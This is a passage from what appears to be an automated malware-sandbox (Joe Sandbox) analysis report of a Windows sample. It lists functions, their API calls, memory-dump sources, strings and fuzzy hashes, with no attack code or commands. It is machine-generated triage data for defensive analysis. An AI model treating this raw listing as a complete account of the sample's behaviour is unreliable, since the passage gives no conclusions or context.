                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                              • String ID:
                                                              • API String ID: 1504782959-0
                                                              • Opcode ID: 0d297e1ce715eabc32487149c9465d4b4f6a40478239e23191458876f64fcc4d
                                                              • Instruction ID: f5b88c3366b729028e0b465fb793f6a7097c4bb9c344c37ab3b307d69f8d570d
                                                              • Opcode Fuzzy Hash: 0d297e1ce715eabc32487149c9465d4b4f6a40478239e23191458876f64fcc4d
                                                              • Instruction Fuzzy Hash: 2E119371500109AFCB00FBA5DD86DEE77B8AF19314B14412AF505A7262DB349F14DB69
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00488B61
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488B73
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488B89
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488BA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 019437fbba57819f97421e338b692ff087a25cdec58e2a3cc2d481b8e9f6e516
                                                              • Instruction ID: be6c6b708449e1320dab14155f15f78223038653fec082c67d76d981a27b2da4
                                                              • Opcode Fuzzy Hash: 019437fbba57819f97421e338b692ff087a25cdec58e2a3cc2d481b8e9f6e516
                                                              • Instruction Fuzzy Hash: 90113A79901218BFDB11DBA5CC84E9EBB74EB48310F6040A6E900B7290DA716E11DB94
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004312D8
                                                              • GetClientRect.USER32(?,?), ref: 0046B5FB
                                                              • GetCursorPos.USER32(?), ref: 0046B605
                                                              • ScreenToClient.USER32(?,?), ref: 0046B610
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 5880c8494b0f533c72820ebad36af210bac67bdaaa240055db53594a632fc853
                                                              • Instruction ID: 9cfac9065d0f922733ef4150bb410e5354b3a3bcc2d54429c7b9744bfc93a2e4
                                                              • Opcode Fuzzy Hash: 5880c8494b0f533c72820ebad36af210bac67bdaaa240055db53594a632fc853
                                                              • Instruction Fuzzy Hash: 59112B35500059FBCB10EF99D8859FF77B8FB09300F4005A6FA11E7251C734BA568BA9
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0048D84D
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0048D864
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0048D879
                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0048D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                              • String ID:
                                                              • API String ID: 1352324309-0
                                                              • Opcode ID: 912b193220bb14a7961c931ddd6e6d6db261d255a3850abe1ca04051a7883f56
                                                              • Instruction ID: 1b9caa12b41934868637f1137be22a53875872c5a3e9a601de2d21c0d19f96ce
                                                              • Opcode Fuzzy Hash: 912b193220bb14a7961c931ddd6e6d6db261d255a3850abe1ca04051a7883f56
                                                              • Instruction Fuzzy Hash: 60115275A06304DBE320AF51DC08F9BBBBCEF00700F10497AA525D6190D7B4E549ABA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 28c744ff2f87b86975b6df1f002b2063e6344aeda8ec72286f16d6602a6e1d6e
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 25014C7244814ABBCF165F84CC01CEE3F62BB18359F598456FE1898131E23BD9B1AB96
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 004BB2E4
                                                              • ScreenToClient.USER32(?,?), ref: 004BB2FC
                                                              • ScreenToClient.USER32(?,?), ref: 004BB320
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004BB33B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: a518392d6bbca83a4ad9600f9d642c8dfd3cda363d6032af9f4cbaba327217bc
                                                              • Instruction ID: abc8358ba2db95d4d8af01185c77c1af934d7bf35c6ddab4150fa2b8251ee018
                                                              • Opcode Fuzzy Hash: a518392d6bbca83a4ad9600f9d642c8dfd3cda363d6032af9f4cbaba327217bc
                                                              • Instruction Fuzzy Hash: D6114775D00609EFDB41CF99C844AEEBBF5FF18310F108166E914E3620D775AA558F94
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00496BE6
                                                                • Part of subcall function 004976C4: _memset.LIBCMT ref: 004976F9
                                                              • _memmove.LIBCMT ref: 00496C09
                                                              • _memset.LIBCMT ref: 00496C16
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00496C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                              • String ID:
                                                              • API String ID: 48991266-0
                                                              • Opcode ID: 3300c88ab316c7b9bf073b0d4a20f36e4f3364aea9093623d244bfc2bf6acd47
                                                              • Instruction ID: 07e5677f8ba46f438ce65dbfe3b837f458b658d2804001bb351c84bc3a49b38a
                                                              • Opcode Fuzzy Hash: 3300c88ab316c7b9bf073b0d4a20f36e4f3364aea9093623d244bfc2bf6acd47
                                                              • Instruction Fuzzy Hash: 20F0303A100100BBCF056F56DC85A8ABF29EF45325B0480A6FE085E227C735A815CBB8
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00432231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0043223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00432250
                                                              • GetStockObject.GDI32(00000005), ref: 00432258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0046BE83
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0046BE90
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0046BEA9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0046BEC2
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0046BEE2
                                                              • ReleaseDC.USER32(?,00000000), ref: 0046BEED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 0efafcc7998f5acc0d9b43945beb39e4f6f3cb3c0976d3f70c05c839031b4f4c
                                                              • Instruction ID: eada655894c1a0ec08da87cc7db9a939d211872530865d313df21f1b8497a3d0
                                                              • Opcode Fuzzy Hash: 0efafcc7998f5acc0d9b43945beb39e4f6f3cb3c0976d3f70c05c839031b4f4c
                                                              • Instruction Fuzzy Hash: 7EE03932104244ABDF215FA8EC0D7D93B10EB05332F008376FA6D980E197B24994DB16
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0048871B
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004882E6), ref: 00488722
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004882E6), ref: 0048872F
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004882E6), ref: 00488736
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: 802032cc05765ba0af61c860e6ea5ca56e5bbb3591430d2de927062f4e4924b2
                                                              • Instruction ID: 347d384f763158cc324a8abbf51bc1a71f3589b0a44ce4d76aef45ee09074202
                                                              • Opcode Fuzzy Hash: 802032cc05765ba0af61c860e6ea5ca56e5bbb3591430d2de927062f4e4924b2
                                                              • Instruction Fuzzy Hash: 8AE08636615211ABD7206FB05D0CB5B3BBCEF54791F144838B649C9050DA388449C754
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %L
                                                              • API String ID: 0-1940408768
                                                              • Opcode ID: 40a5f43df0b10c0957a2b5515221a0a07695d52c92d969f79db30fb6346da466
                                                              • Instruction ID: 1c104f26fbb69cad1d058a9b85c08d299fe767c31f82a2eede6e967104ff1677
                                                              • Opcode Fuzzy Hash: 40a5f43df0b10c0957a2b5515221a0a07695d52c92d969f79db30fb6346da466
                                                              • Instruction Fuzzy Hash: 58B1C471D0010AAACF24EF94C4819FEB7B5EF5C314F51A02BE941A7291DB389D82CB9D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __itow_s
                                                              • String ID: xbO$xbO
                                                              • API String ID: 3653519197-426669150
                                                              • Opcode ID: ad70f6037c522d48275f3732b7c034acd29042bc795bff8b498e229b1b36b7ea
                                                              • Instruction ID: 845f6965280580b7760cd6c1828b31985a464b0d274ac7e4b113f496b17eab1c
                                                              • Opcode Fuzzy Hash: ad70f6037c522d48275f3732b7c034acd29042bc795bff8b498e229b1b36b7ea
                                                              • Instruction Fuzzy Hash: A3B19070600109EFCB14DF65C891EBABBB9FF59344F14805BF9459B292EB38D941CB98
                                                              APIs
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • __wcsnicmp.LIBCMT ref: 0049B02D
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0049B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: 53eb3c12e791efbf345e7341df8764a7add08b0210f5c52c41c2ceb42cd2863d
                                                              • Instruction ID: 1fadece54e1a2d9a2170c11f2936b1475ca77b7ede9437f89960b467744d3231
                                                              • Opcode Fuzzy Hash: 53eb3c12e791efbf345e7341df8764a7add08b0210f5c52c41c2ceb42cd2863d
                                                              • Instruction Fuzzy Hash: 4C619375A00215EFCF14DF94D992EAEBBB4EB08350F10406AF816AB351D778AE44CB99
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00442968
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00442981
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: a5dbd513ff2efd448b15a9e56a5f51acc60c0dd497d39e05ac874576e2c633bb
                                                              • Instruction ID: 7f63ea04729ada54793b515282d8fc33302b16c75a41dee6fbc9c7e034b949e8
                                                              • Opcode Fuzzy Hash: a5dbd513ff2efd448b15a9e56a5f51acc60c0dd497d39e05ac874576e2c633bb
                                                              • Instruction Fuzzy Hash: F45138714187449BD320EF11D886BABBBE8FB89344F41485EF2D8810A1DB759929CB5A
                                                              APIs
                                                                • Part of subcall function 00434F0B: __fread_nolock.LIBCMT ref: 00434F29
                                                              • _wcscmp.LIBCMT ref: 00499824
                                                              • _wcscmp.LIBCMT ref: 00499837
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: afec2adaf6b8254b3ff030608d24184e61bf46639249f7b8f41425bcf5c73ef7
                                                              • Instruction ID: 844ca108f498ff9d8333dbccdc10814d3a95c623cc0cb88d0c7570745d13a229
                                                              • Opcode Fuzzy Hash: afec2adaf6b8254b3ff030608d24184e61bf46639249f7b8f41425bcf5c73ef7
                                                              • Instruction Fuzzy Hash: 1D41AA71A00219BADF109AA5CC45FEF7BB9DF89714F00047FF904A7181D675AD058765
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID: DdO$DdO
                                                              • API String ID: 1473721057-3688882967
                                                              • Opcode ID: e8faa9439242551212b6bb1653ae07b9c39c96f711bbc0dc64c18978360fd816
                                                              • Instruction ID: 80f26a36df3eaa3945cfe7a8cc9e57fe0dfe68cc6fe60363518c350c4ad2a585
                                                              • Opcode Fuzzy Hash: e8faa9439242551212b6bb1653ae07b9c39c96f711bbc0dc64c18978360fd816
                                                              • Instruction Fuzzy Hash: 195122786043418FDB54DF18C480A2BBBF1BB99354F54986EE8858B321D339EC91CF4A
                                                              APIs
                                                              • _memset.LIBCMT ref: 004A259E
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004A25D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 5d2af376f292f6c985fa9d9edc5caf52bcd5cad43d04bae6728bc464681a8250
                                                              • Instruction ID: ef0063a33eb437d73ed0c89e47420f7099f6d16eaf468581e8660f4b1d24e7f4
                                                              • Opcode Fuzzy Hash: 5d2af376f292f6c985fa9d9edc5caf52bcd5cad43d04bae6728bc464681a8250
                                                              • Instruction Fuzzy Hash: E9313971801119ABCF11EFA5CC85EEEBFB8FF19304F10105AF914B6162DB355916DB64
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004B7B61
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004B7B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: c02239a3a0af4f938d99d75c8c0db705bb55c81b402c45e2cb12fd5940c2ff0d
                                                              • Instruction ID: 9982d7110f106f463a02453332080d964272b63a703186e82a0fb48849733d7c
                                                              • Opcode Fuzzy Hash: c02239a3a0af4f938d99d75c8c0db705bb55c81b402c45e2cb12fd5940c2ff0d
                                                              • Instruction Fuzzy Hash: 08413974A082099FDB54CF68C880BEABBB5FF48304F10416AE904EB381D774A951CFA4
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 004B6B17
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004B6B53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 5be553ee0ab6215fc6c76fad21b2b55bb37ef88bb6d36c875915c7e2fbe85155
                                                              • Instruction ID: 16530a0ceb86f8bc0f5ddbe55308d52785fe629b78d8bb438af0c17eafb4909b
                                                              • Opcode Fuzzy Hash: 5be553ee0ab6215fc6c76fad21b2b55bb37ef88bb6d36c875915c7e2fbe85155
                                                              • Instruction Fuzzy Hash: 5931AE71110604AADB109F69CC40BFB73B9FF48724F11862AF9A9D3290DA38AC51CB68
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492911
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0049294C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
